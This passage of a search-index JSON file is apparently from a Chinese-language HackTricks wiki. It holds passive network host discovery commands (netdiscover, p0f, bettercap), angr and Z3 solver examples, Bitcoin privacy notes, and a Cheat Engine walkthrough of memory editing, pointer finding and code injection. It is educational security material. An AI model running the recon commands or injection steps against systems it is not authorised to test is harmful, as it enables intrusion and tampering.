umbs":7,"title":1},"9814":{"body":32,"breadcrumbs":8,"title":2},"9815":{"body":77,"breadcrumbs":8,"title":2},"9816":{"body":40,"breadcrumbs":6,"title":0},"9817":{"body":39,"breadcrumbs":6,"title":0},"9818":{"body":0,"breadcrumbs":6,"title":0},"9819":{"body":37,"breadcrumbs":8,"title":2},"982":{"body":1,"breadcrumbs":2,"title":0},"9820":{"body":50,"breadcrumbs":7,"title":1},"9821":{"body":50,"breadcrumbs":10,"title":4},"9822":{"body":44,"breadcrumbs":5,"title":1},"9823":{"body":4,"breadcrumbs":4,"title":0},"9824":{"body":4,"breadcrumbs":5,"title":1},"9825":{"body":4,"breadcrumbs":5,"title":1},"9826":{"body":5,"breadcrumbs":5,"title":1},"9827":{"body":5,"breadcrumbs":5,"title":1},"9828":{"body":6,"breadcrumbs":6,"title":2},"9829":{"body":7,"breadcrumbs":5,"title":1},"983":{"body":0,"breadcrumbs":2,"title":0},"9830":{"body":7,"breadcrumbs":6,"title":2},"9831":{"body":6,"breadcrumbs":5,"title":1},"9832":{"body":41,"breadcrumbs":5,"title":1},"9833":{"body":39,"breadcrumbs":10,"title":2},"9834":{"body":2,"breadcrumbs":8,"title":0},"9835":{"body":47,"breadcrumbs":9,"title":1},"9836":{"body":3,"breadcrumbs":10,"title":2},"9837":{"body":15,"breadcrumbs":11,"title":3},"9838":{"body":0,"breadcrumbs":11,"title":3},"9839":{"body":9,"breadcrumbs":13,"title":5},"984":{"body":0,"breadcrumbs":3,"title":1},"9840":{"body":36,"breadcrumbs":11,"title":3},"9841":{"body":20,"breadcrumbs":9,"title":1},"9842":{"body":22,"breadcrumbs":8,"title":0},"9843":{"body":2,"breadcrumbs":8,"title":0},"9844":{"body":4,"breadcrumbs":8,"title":0},"9845":{"body":16,"breadcrumbs":8,"title":0},"9846":{"body":60,"breadcrumbs":9,"title":1},"9847":{"body":0,"breadcrumbs":8,"title":0},"9848":{"body":1,"breadcrumbs":9,"title":1},"9849":{"body":5,"breadcrumbs":9,"title":1},"985":{"body":8,"breadcrumbs":2,"title":0},"9850":{"body":0,"breadcrumbs":9,"title":1},"9851":{"body":100,"breadcrumbs":10,"title":2},"9852":{"body":2,"breadcrumbs":9,"title":1},"9853":{"body":35,"breadcrumbs":9,"title":1},"9854":{"body":39,"breadcrumbs":8,"title":2},"9855":{"body":5,"breadcrumbs":7,"title":1},"9856":{"body":59,"breadcrumbs":8,"title":2},"9857":{"body":63,"breadcrumbs":9,"title":3},"9858":{"body":100,"breadcrumbs":8,"title":2},"9859":{"body":40,"breadcrumbs":6,"title":0},"986":{"body":0,"breadcrumbs":2,"title":0},"9860":{"body":39,"breadcrumbs":8,"title":1},"9861":{"body":1,"breadcrumbs":7,"title":0},"9862":{"body":0,"breadcrumbs":7,"title":0},"9863":{"body":1,"breadcrumbs":7,"title":0},"9864":{"body":161,"breadcrumbs":7,"title":0},"9865":{"body":350,"breadcrumbs":7,"title":0},"9866":{"body":0,"breadcrumbs":9,"title":2},"9867":{"body":47,"breadcrumbs":8,"title":1},"9868":{"body":39,"breadcrumbs":10,"title":3},"9869":{"body":11,"breadcrumbs":9,"title":2},"987":{"body":2,"breadcrumbs":3,"title":1},"9870":{"body":23,"breadcrumbs":9,"title":2},"9871":{"body":74,"breadcrumbs":10,"title":3},"9872":{"body":41,"breadcrumbs":7,"title":0},"9873":{"body":0,"breadcrumbs":7,"title":0},"9874":{"body":0,"breadcrumbs":7,"title":0},"9875":{"body":3,"breadcrumbs":7,"title":0},"9876":{"body":21,"breadcrumbs":7,"title":0},"9877":{"body":80,"breadcrumbs":7,"title":0},"9878":{"body":40,"breadcrumbs":7,"title":0},"9879":{"body":39,"breadcrumbs":8,"title":1},"988":{"body":8,"breadcrumbs":5,"title":3},"9880":{"body":2,"breadcrumbs":7,"title":0},"9881":{"body":8,"breadcrumbs":7,"title":0},"9882":{"body":0,"breadcrumbs":7,"title":0},"9883":{"body":42,"breadcrumbs":7,"title":0},"9884":{"body":1,"breadcrumbs":7,"title":0},"9885":{"body":38,"breadcrumbs":7,"title":0},"9886":{"body":92,"breadcrumbs":7,"title":0},"9887":{"body":0,"breadcrumbs":7,"title":0},"9888":{"body":19,"breadcrumbs":7,"title":0},"9889":{"body":11,"breadcrumbs":8,"title":1},"989":{"body":35,"breadcrumbs":6,"title":4},"9890":{"body":166,"breadcrumbs":7,"title":0},"9891":{"body":0,"breadcrumbs":7,"title":0},"9892":{"body":235,"breadcrumbs":7,"title":0},"9893":{"body":40,"breadcrumbs":8,"title":1},"9894":{"body":39,"breadcrumbs":10,"title":3},"9895":{"body":10,"breadcrumbs":9,"title":2},"9896":{"body":440,"breadcrumbs":7,"title":0},"9897":{"body":24,"breadcrumbs":8,"title":1},"9898":{"body":66,"breadcrumbs":7,"title":0},"9899":{"body":4,"breadcrumbs":7,"title":0},"99":{"body":3,"breadcrumbs":3,"title":1},"990":{"body":39,"breadcrumbs":2,"title":0},"9900":{"body":63,"breadcrumbs":7,"title":0},"9901":{"body":128,"breadcrumbs":8,"title":1},"9902":{"body":145,"breadcrumbs":8,"title":1},"9903":{"body":48,"breadcrumbs":7,"title":0},"9904":{"body":196,"breadcrumbs":7,"title":0},"9905":{"body":118,"breadcrumbs":7,"title":0},"9906":{"body":40,"breadcrumbs":7,"title":0},"9907":{"body":39,"breadcrumbs":10,"title":1},"9908":{"body":1,"breadcrumbs":9,"title":0},"9909":{"body":8,"breadcrumbs":9,"title":0},"991":{"body":3,"breadcrumbs":2,"title":0},"9910":{"body":1120,"breadcrumbs":9,"title":0},"9911":{"body":31,"breadcrumbs":10,"title":1},"9912":{"body":167,"breadcrumbs":9,"title":0},"9913":{"body":73,"breadcrumbs":11,"title":2},"9914":{"body":29,"breadcrumbs":9,"title":0},"9915":{"body":68,"breadcrumbs":11,"title":2},"9916":{"body":54,"breadcrumbs":9,"title":0},"9917":{"body":202,"breadcrumbs":9,"title":0},"9918":{"body":41,"breadcrumbs":11,"title":2},"9919":{"body":84,"breadcrumbs":9,"title":0},"992":{"body":0,"breadcrumbs":2,"title":0},"9920":{"body":52,"breadcrumbs":9,"title":0},"9921":{"body":16,"breadcrumbs":10,"title":1},"9922":{"body":40,"breadcrumbs":9,"title":0},"9923":{"body":39,"breadcrumbs":11,"title":2},"9924":{"body":115,"breadcrumbs":10,"title":1},"9925":{"body":40,"breadcrumbs":9,"title":0},"9926":{"body":39,"breadcrumbs":12,"title":4},"9927":{"body":2,"breadcrumbs":8,"title":0},"9928":{"body":0,"breadcrumbs":8,"title":0},"9929":{"body":9,"breadcrumbs":8,"title":0},"993":{"body":0,"breadcrumbs":2,"title":0},"9930":{"body":0,"breadcrumbs":8,"title":0},"9931":{"body":4,"breadcrumbs":8,"title":0},"9932":{"body":15,"breadcrumbs":8,"title":0},"9933":{"body":32,"breadcrumbs":8,"title":0},"9934":{"body":73,"breadcrumbs":11,"title":3},"9935":{"body":7,"breadcrumbs":9,"title":1},"9936":{"body":40,"breadcrumbs":8,"title":0},"9937":{"body":40,"breadcrumbs":10,"title":1},"9938":{"body":92,"breadcrumbs":9,"title":0},"9939":{"body":5,"breadcrumbs":9,"title":0},"994":{"body":0,"breadcrumbs":2,"title":0},"9940":{"body":0,"breadcrumbs":10,"title":1},"9941":{"body":17,"breadcrumbs":9,"title":0},"9942":{"body":4,"breadcrumbs":9,"title":0},"9943":{"body":40,"breadcrumbs":9,"title":0},"9944":{"body":39,"breadcrumbs":4,"title":0},"9945":{"body":2,"breadcrumbs":5,"title":1},"9946":{"body":10,"breadcrumbs":6,"title":2},"9947":{"body":0,"breadcrumbs":5,"title":1},"9948":{"body":9,"breadcrumbs":5,"title":1},"9949":{"body":5,"breadcrumbs":6,"title":2},"995":{"body":2,"breadcrumbs":2,"title":0},"9950":{"body":9,"breadcrumbs":6,"title":2},"9951":{"body":10,"breadcrumbs":5,"title":1},"9952":{"body":49,"breadcrumbs":5,"title":1},"9953":{"body":4,"breadcrumbs":6,"title":2},"9954":{"body":0,"breadcrumbs":6,"title":2},"9955":{"body":9,"breadcrumbs":6,"title":2},"9956":{"body":20,"breadcrumbs":6,"title":2},"9957":{"body":10,"breadcrumbs":7,"title":3},"9958":{"body":23,"breadcrumbs":6,"title":2},"9959":{"body":0,"breadcrumbs":5,"title":1},"996":{"body":3,"breadcrumbs":2,"title":0},"9960":{"body":11,"breadcrumbs":7,"title":3},"9961":{"body":6,"breadcrumbs":7,"title":3},"9962":{"body":2,"breadcrumbs":8,"title":4},"9963":{"body":69,"breadcrumbs":9,"title":5},"9964":{"body":1,"breadcrumbs":5,"title":1},"9965":{"body":28,"breadcrumbs":5,"title":1},"9966":{"body":2,"breadcrumbs":5,"title":1},"9967":{"body":11,"breadcrumbs":5,"title":1},"9968":{"body":7,"breadcrumbs":5,"title":1},"9969":{"body":11,"breadcrumbs":5,"title":1},"997":{"body":0,"breadcrumbs":2,"title":0},"9970":{"body":141,"breadcrumbs":8,"title":4},"9971":{"body":1,"breadcrumbs":6,"title":2},"9972":{"body":37,"breadcrumbs":5,"title":1},"9973":{"body":62,"breadcrumbs":5,"title":0},"9974":{"body":47,"breadcrumbs":5,"title":0},"9975":{"body":0,"breadcrumbs":5,"title":0},"9976":{"body":72,"breadcrumbs":5,"title":0},"9977":{"body":89,"breadcrumbs":5,"title":0},"9978":{"body":42,"breadcrumbs":5,"title":0},"9979":{"body":30,"breadcrumbs":5,"title":0},"998":{"body":0,"breadcrumbs":2,"title":0},"9980":{"body":0,"breadcrumbs":5,"title":0},"9981":{"body":71,"breadcrumbs":5,"title":0},"9982":{"body":21,"breadcrumbs":5,"title":0},"9983":{"body":32,"breadcrumbs":5,"title":0},"9984":{"body":142,"breadcrumbs":5,"title":0},"9985":{"body":27,"breadcrumbs":5,"title":0},"9986":{"body":35,"breadcrumbs":5,"title":0},"9987":{"body":44,"breadcrumbs":8,"title":1},"9988":{"body":56,"breadcrumbs":7,"title":0},"9989":{"body":59,"breadcrumbs":7,"title":0},"999":{"body":0,"breadcrumbs":2,"title":0},"9990":{"body":140,"breadcrumbs":7,"title":0},"9991":{"body":158,"breadcrumbs":7,"title":0},"9992":{"body":119,"breadcrumbs":7,"title":0},"9993":{"body":119,"breadcrumbs":8,"title":1},"9994":{"body":133,"breadcrumbs":7,"title":0},"9995":{"body":152,"breadcrumbs":7,"title":0},"9996":{"body":56,"breadcrumbs":9,"title":2},"9997":{"body":144,"breadcrumbs":7,"title":0},"9998":{"body":155,"breadcrumbs":8,"title":1},"9999":{"body":134,"breadcrumbs":8,"title":1}},"docs":{"0":{"body":"Reading time: 11 minutes Hacktricks 标志和动态设计由 @ppieranacho .","breadcrumbs":"HackTricks » HackTricks","id":"0","title":"HackTricks"},"1":{"body":"bash # Download latest version of hacktricks\\ngit clone https://github.com/HackTricks-wiki/hacktricks # Select the language you want to use\\nexport LANG=\\"master\\" # Leave master for english\\n# \\"af\\" for Afrikaans\\n# \\"de\\" for German\\n# \\"el\\" for Greek\\n# \\"es\\" for Spanish\\n# \\"fr\\" for French\\n# \\"hi\\" for HindiP\\n# \\"it\\" for Italian\\n# \\"ja\\" for Japanese\\n# \\"ko\\" for Korean\\n# \\"pl\\" for Polish\\n# \\"pt\\" for Portuguese\\n# \\"sr\\" for Serbian\\n# \\"sw\\" for Swahili\\n# \\"tr\\" for Turkish\\n# \\"uk\\" for Ukrainian\\n# \\"zh\\" for Chinese # Run the docker container indicating the path to the hacktricks folder\\ndocker run -d --rm --platform linux/amd64 -p 3337:3000 --name hacktricks -v $(pwd)/hacktricks:/app ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image bash -c \\"mkdir -p ~/.ssh && ssh-keyscan -H github.com >> ~/.ssh/known_hosts && cd /app && git config --global --add safe.directory /app && git checkout $LANG && git pull && MDBOOK_PREPROCESSOR__HACKTRICKS__ENV=dev mdbook serve --hostname 0.0.0.0\\" 您的本地 HackTricks 副本将在 http://localhost:3337 后 <5 分钟可用(它需要构建书籍,请耐心等待)。","breadcrumbs":"HackTricks » 本地运行 HackTricks","id":"1","title":"本地运行 HackTricks"},"10":{"body":"学习执行漏洞研究、渗透测试和逆向工程所需的技术和技能,以保护移动应用和设备。通过我们的按需课程 掌握 iOS 和 Android 安全 并 获得认证 : On-demand Mobile Security Training | 8kSec Academy","breadcrumbs":"HackTricks » 8kSec Academy – 深入的移动安全课程","id":"10","title":"8kSec Academy – 深入的移动安全课程"},"100":{"body":"你可以使用这些工具在已连接的 network 中被动地发现 hosts: bash netdiscover -p\\np0f -i eth0 -p -o /tmp/p0f.log\\n# Bettercap\\nnet.recon on/off #Read local ARP cache periodically\\nnet.show\\nset net.show.meta true #more info","breadcrumbs":"Pentesting Network » Passive","id":"100","title":"Passive"},"1000":{"body":"UTXO,或 未花费交易输出 ,必须在交易中完全花费。如果只有一部分发送到另一个地址,剩余部分将转到新的找零地址。观察者可以假设这个新地址属于发送者,从而损害隐私。","breadcrumbs":"Blockchain & Crypto » UTXO找零地址检测","id":"1000","title":"UTXO找零地址检测"},"10000":{"body":"python # This challenge is the exact same as the first challenge, except that it was\\n# compiled as a static binary. Normally, Angr automatically replaces standard\\n# library functions with SimProcedures that work much more quickly.\\n#\\n# To solve the challenge, manually hook any standard library c functions that\\n# are used. Then, ensure that you begin the execution at the beginning of the\\n# main function. Do not use entry_state.\\n#\\n# Here are a few SimProcedures Angr has already written for you. They implement\\n# standard library functions. You will not need all of them:\\n# angr.SIM_PROCEDURES[\'libc\'][\'malloc\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'fopen\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'fclose\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'fwrite\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'getchar\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'strncmp\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'strcmp\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'scanf\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'printf\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'puts\']\\n# angr.SIM_PROCEDURES[\'libc\'][\'exit\']\\n#\\n# As a reminder, you can hook functions with something similar to:\\n# project.hook(malloc_address, angr.SIM_PROCEDURES[\'libc\'][\'malloc\']())\\n#\\n# There are many more, see:\\n# https://github.com/angr/angr/tree/master/angr/procedures/libc import angr\\nimport sys def main(argv):\\npath_to_binary = argv[1]\\nproject = angr.Project(path_to_binary) initial_state = project.factory.entry_state() #Find the addresses were the lib functions are loaded in the binary\\n#For example you could find: call 0x804ed80 <__isoc99_scanf>\\nproject.hook(0x804ed40, angr.SIM_PROCEDURES[\'libc\'][\'printf\']())\\nproject.hook(0x804ed80, angr.SIM_PROCEDURES[\'libc\'][\'scanf\']())\\nproject.hook(0x804f350, angr.SIM_PROCEDURES[\'libc\'][\'puts\']())\\nproject.hook(0x8048d10, angr.SIM_PROCEDURES[\'glibc\'][\'__libc_start_main\']()) simulation = project.factory.simgr(initial_state) def is_successful(state):\\nstdout_output = state.posix.dumps(sys.stdout.fileno())\\nreturn \'Good Job.\'.encode() in stdout_output # :boolean def should_abort(state):\\nstdout_output = state.posix.dumps(sys.stdout.fileno())\\nreturn \'Try again.\'.encode() in stdout_output # :boolean simulation.explore(find=is_successful, avoid=should_abort) if simulation.found:\\nsolution_state = simulation.found[0]\\nprint(solution_state.posix.dumps(sys.stdin.fileno()).decode())\\nelse:\\nraise Exception(\'Could not find the solution\') if __name__ == \'__main__\':\\nmain(sys.argv) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reversing Tools & Basic Methods » Angr » Angr - Examples » 静态二进制文件","id":"10000","title":"静态二进制文件"},"10001":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 非常基本地,这个工具将帮助我们找到需要满足某些条件的变量的值,手动计算这些值会非常麻烦。因此,您可以向 Z3 指示变量需要满足的条件,它将找到一些值(如果可能的话)。 一些文本和示例摘自 https://ericpony.github.io/z3py-tutorial/guide-examples.htm","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 基本操作","id":"10001","title":"基本操作"},"10002":{"body":"python #pip3 install z3-solver\\nfrom z3 import *\\ns = Solver() #The solver will be given the conditions x = Bool(\\"x\\") #Declare the symbos x, y and z\\ny = Bool(\\"y\\")\\nz = Bool(\\"z\\") # (x or y or !z) and y\\ns.add(And(Or(x,y,Not(z)),y))\\ns.check() #If response is \\"sat\\" then the model is satifable, if \\"unsat\\" something is wrong\\nprint(s.model()) #Print valid values to satisfy the model","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 布尔值/与/或/非","id":"10002","title":"布尔值/与/或/非"},"10003":{"body":"python from z3 import * x = Int(\'x\')\\ny = Int(\'y\')\\n#Simplify a \\"complex\\" ecuation\\nprint(simplify(And(x + 1 >= 3, x**2 + x**2 + y**2 + 2 >= 5)))\\n#And(x >= 2, 2*x**2 + y**2 >= 3) #Note that Z3 is capable to treat irrational numbers (An irrational algebraic number is a root of a polynomial with integer coefficients. Internally, Z3 represents all these numbers precisely.)\\n#so you can get the decimals you need from the solution\\nr1 = Real(\'r1\')\\nr2 = Real(\'r2\')\\n#Solve the ecuation\\nprint(solve(r1**2 + r2**2 == 3, r1**3 == 2))\\n#Solve the ecuation with 30 decimals\\nset_option(precision=30)\\nprint(solve(r1**2 + r2**2 == 3, r1**3 == 2))","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 整数/简化/实数","id":"10003","title":"整数/简化/实数"},"10004":{"body":"python from z3 import * x, y, z = Reals(\'x y z\')\\ns = Solver()\\ns.add(x > 1, y > 1, x + y > 3, z - x < 10)\\ns.check() m = s.model()\\nprint (\\"x = %s\\" % m[x])\\nfor d in m.decls():\\nprint(\\"%s = %s\\" % (d.name(), m[d]))","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 打印模型","id":"10004","title":"打印模型"},"10005":{"body":"现代CPU和主流编程语言使用 固定大小位向量 进行算术运算。机器算术在Z3Py中作为 位向量 可用。 python from z3 import * x = BitVec(\'x\', 16) #Bit vector variable \\"x\\" of length 16 bit\\ny = BitVec(\'y\', 16) e = BitVecVal(10, 16) #Bit vector with value 10 of length 16bits\\na = BitVecVal(-1, 16)\\nb = BitVecVal(65535, 16)\\nprint(simplify(a == b)) #This is True!\\na = BitVecVal(-1, 32)\\nb = BitVecVal(65535, 32)\\nprint(simplify(a == b)) #This is False","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 机器算术","id":"10005","title":"机器算术"},"10006":{"body":"Z3 提供了特殊的有符号算术运算版本,在这里 位向量是被视为有符号还是无符号 是有区别的。在 Z3Py 中,运算符 <, <=, >, >=, /, % 和 >> 对应于 有符号 版本。相应的 无符号 运算符是 ULT, ULE, UGT, UGE, UDiv, URem 和 LShR. python from z3 import * # Create to bit-vectors of size 32\\nx, y = BitVecs(\'x y\', 32)\\nsolve(x + y == 2, x > 0, y > 0) # Bit-wise operators\\n# & bit-wise and\\n# | bit-wise or\\n# ~ bit-wise not\\nsolve(x & y == ~y)\\nsolve(x < 0) # using unsigned version of <\\nsolve(ULT(x, 0))","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 有符号/无符号数字","id":"10006","title":"有符号/无符号数字"},"10007":{"body":"解释函数 ,例如算术,其中 函数 + 具有 固定的标准解释 (它将两个数字相加)。 未解释函数 和常量是 最大灵活的 ;它们允许与函数或常量的 约束 一致的 任何解释 。 示例:将 f 应用两次于 x 结果再次得到 x,但将 f 应用一次于 x 则与 x 不同。 python from z3 import * x = Int(\'x\')\\ny = Int(\'y\')\\nf = Function(\'f\', IntSort(), IntSort())\\ns = Solver()\\ns.add(f(f(x)) == x, f(x) == y, x != y)\\ns.check()\\nm = s.model()\\nprint(\\"f(f(x)) =\\", m.evaluate(f(f(x))))\\nprint(\\"f(x) =\\", m.evaluate(f(x))) print(m.evaluate(f(2)))\\ns.add(f(x) == 4) #Find the value that generates 4 as response\\ns.check()\\nprint(m.model())","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 函数","id":"10007","title":"函数"},"10008":{"body":"","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 示例","id":"10008","title":"示例"},"10009":{"body":"python # 9x9 matrix of integer variables\\nX = [ [ Int(\\"x_%s_%s\\" % (i+1, j+1)) for j in range(9) ]\\nfor i in range(9) ] # each cell contains a value in {1, ..., 9}\\ncells_c = [ And(1 <= X[i][j], X[i][j] <= 9)\\nfor i in range(9) for j in range(9) ] # each row contains a digit at most once\\nrows_c = [ Distinct(X[i]) for i in range(9) ] # each column contains a digit at most once\\ncols_c = [ Distinct([ X[i][j] for i in range(9) ])\\nfor j in range(9) ] # each 3x3 square contains a digit at most once\\nsq_c = [ Distinct([ X[3*i0 + i][3*j0 + j]\\nfor i in range(3) for j in range(3) ])\\nfor i0 in range(3) for j0 in range(3) ] sudoku_c = cells_c + rows_c + cols_c + sq_c # sudoku instance, we use \'0\' for empty cells\\ninstance = ((0,0,0,0,9,4,0,3,0),\\n(0,0,0,5,1,0,0,0,7),\\n(0,8,9,0,0,0,0,4,0),\\n(0,0,0,0,0,0,2,0,8),\\n(0,6,0,2,0,1,0,5,0),\\n(1,0,2,0,0,0,0,0,0),\\n(0,7,0,0,0,0,5,2,0),\\n(9,0,0,0,6,5,0,0,0),\\n(0,4,0,9,7,0,0,0,0)) instance_c = [ If(instance[i][j] == 0,\\nTrue,\\nX[i][j] == instance[i][j])\\nfor i in range(9) for j in range(9) ] s = Solver()\\ns.add(sudoku_c + instance_c)\\nif s.check() == sat:\\nm = s.model()\\nr = [ [ m.evaluate(X[i][j]) for j in range(9) ]\\nfor i in range(9) ]\\nprint_matrix(r)\\nelse:\\nprint \\"failed to solve\\"","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 数独求解器","id":"10009","title":"数独求解器"},"1001":{"body":"为了解决这个问题,混合服务或使用多个地址可以帮助模糊所有权。","breadcrumbs":"Blockchain & Crypto » 示例","id":"1001","title":"示例"},"10010":{"body":"https://ericpony.github.io/z3py-tutorial/guide-examples.htm tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reversing Tools & Basic Methods » Z3 - Satisfiability Modulo Theories (SMT) » 参考文献","id":"10010","title":"参考文献"},"10011":{"body":"Reading time: 16 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 Cheat Engine 是一个有用的程序,可以找到正在运行的游戏内重要值存储的位置并进行更改。 当你下载并运行它时,你会 看到 一个 教程 ,介绍如何使用该工具。如果你想学习如何使用该工具,强烈建议完成这个教程。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » Cheat Engine","id":"10011","title":"Cheat Engine"},"10012":{"body":"这个工具非常有用,可以找到 某个值 (通常是一个数字) 在程序内存中的存储位置 。 通常数字 以 4字节 形式存储,但你也可以找到 双精度 或 浮点 格式,或者你可能想寻找 不同于数字 的东西。因此,你需要确保 选择 你想要 搜索的内容 : 你还可以指示 不同 类型的 搜索 : 你还可以勾选框以 在扫描内存时停止游戏 :","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 你在搜索什么?","id":"10012","title":"你在搜索什么?"},"10013":{"body":"在 编辑 --> 设置 --> 热键 中,你可以为不同的目的设置不同的 热键 ,例如 停止 游戏 (如果你想在某个时刻扫描内存,这非常有用)。还有其他选项可用:","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 热键","id":"10013","title":"热键"},"10014":{"body":"一旦你 找到 你 寻找的值 的 位置 (更多内容在后面的步骤中),你可以通过双击它来 修改 ,然后双击它的值: 最后 勾选 以在内存中完成修改: 对 内存 的 更改 将立即 应用 (请注意,直到游戏不再使用此值,该值 不会在游戏中更新 )。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 修改值","id":"10014","title":"修改值"},"10015":{"body":"所以,我们假设有一个重要的值(比如你用户的生命值)你想要提高,并且你正在内存中寻找这个值)","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 搜索值","id":"10015","title":"搜索值"},"10016":{"body":"假设你在寻找值 100,你 执行扫描 搜索该值,并找到很多匹配项: 然后,你做一些事情使得 值发生变化 ,你 停止 游戏并 执行 下一次扫描 : Cheat Engine 将搜索 从 100 变为新值 的 值 。恭喜,你 找到了 你正在寻找的 值的地址 ,现在你可以修改它。 如果你仍然有多个值,做一些事情再次修改该值,并执行另一个“下一次扫描”以过滤地址。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 通过已知的变化","id":"10016","title":"通过已知的变化"},"10017":{"body":"在你 不知道值 但你知道 如何使其变化 (甚至变化的值)的情况下,你可以寻找你的数字。 所以,首先执行一种类型为“ 未知初始值 ”的扫描: 然后,使值发生变化,指示 值 如何变化 (在我的例子中是减少了 1),并执行 下一次扫描 : 你将看到 所有以所选方式修改的值 : 一旦你找到了你的值,你可以修改它。 请注意,有很多 可能的变化 ,你可以根据需要 多次执行这些步骤 以过滤结果:","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 未知值,已知变化","id":"10017","title":"未知值,已知变化"},"10018":{"body":"到目前为止,我们学习了如何找到存储值的地址,但在 游戏的不同执行中,该地址很可能位于内存的不同位置 。所以让我们找出如何始终找到该地址。 使用一些提到的技巧,找到当前游戏存储重要值的地址。然后(如果你愿意,可以停止游戏)右键单击找到的 地址 ,选择“ 查找访问此地址的内容 ”或“ 查找写入此地址的内容 ”: 第一个选项 有助于了解 代码 的 哪些部分 在 使用 这个 地址 (这对于更多事情很有用,比如 知道你可以在哪里修改游戏的代码 )。 第二个选项 更加 具体 ,在这种情况下更有帮助,因为我们想知道 这个值是从哪里写入的 。 一旦你选择了其中一个选项, 调试器 将 附加 到程序,并且会出现一个新的 空窗口 。现在, 玩 游戏 并 修改 该 值 (无需重新启动游戏)。 窗口 应该会 填充 正在 修改 该 值 的 地址 : 现在你找到了修改值的地址,你可以 随意修改代码 (Cheat Engine 允许你快速将其修改为 NOP): 因此,你现在可以修改它,使得代码不会影响你的数字,或者总是以积极的方式影响它。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 随机内存地址 - 查找代码","id":"10018","title":"随机内存地址 - 查找代码"},"10019":{"body":"按照之前的步骤,找到你感兴趣的值。然后,使用“ 查找写入此地址的内容 ”找出哪个地址写入这个值,并双击它以获取反汇编视图: 然后,执行新的扫描 搜索“[]”之间的十六进制值 (在这种情况下是 $edx 的值): ( 如果出现多个,通常需要最小的地址 ) 现在,我们已经 找到了将修改我们感兴趣的值的指针 。 点击“ 手动添加地址 ”: 现在,勾选“指针”复选框,并在文本框中添加找到的地址(在这种情况下,前一张图片中找到的地址是 \\"Tutorial-i386.exe\\"+2426B0): (注意第一个“地址”是从你输入的指针地址自动填充的) 点击确定,一个新的指针将被创建: 现在,每次你修改该值时,你都在 修改重要值,即使值所在的内存地址不同。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 随机内存地址 - 查找指针","id":"10019","title":"随机内存地址 - 查找指针"},"1002":{"body":"用户有时在网上分享他们的比特币地址,使得 很容易将地址与其所有者关联 。","breadcrumbs":"Blockchain & Crypto » 社交网络与论坛曝光","id":"1002","title":"社交网络与论坛曝光"},"10020":{"body":"代码注入是一种技术,你将一段代码注入到目标进程中,然后重新引导代码的执行以通过你自己编写的代码(例如给你积分而不是减少它们)。 所以,想象一下你找到了一个地址,它正在从你的玩家生命中减去 1: 点击显示反汇编以获取 反汇编代码 。 然后,点击 CTRL+a 调用自动汇编窗口,并选择 模板 --> 代码注入 填写 你想要修改的指令的地址 (这通常是自动填充的): 将生成一个模板: 因此,将你的新汇编代码插入到“ newmem ”部分,并从“ originalcode 